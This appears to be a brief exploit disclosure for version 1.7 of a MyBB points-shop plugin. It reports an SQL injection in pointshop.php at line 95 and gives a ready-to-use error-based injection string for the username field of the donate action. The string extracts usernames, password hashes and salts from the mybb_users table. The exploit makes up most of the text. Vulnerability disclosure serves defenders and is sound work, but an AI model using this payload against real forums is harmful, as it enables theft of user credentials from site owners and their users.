# Version: 1.7
Introduction
------------
Give the user points and posts, Store points, automatic Achievements
SQL injection
-------------
pointshop.php L.95
You must go there : http://pentest.lan/mybb/pointshop.php?action=donate
And set as username : user' and (select 1 from(select count(*),concat((select concat(username, 0x3a, password, 0x3a, salt, 0x3a) from mybb_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
Groucho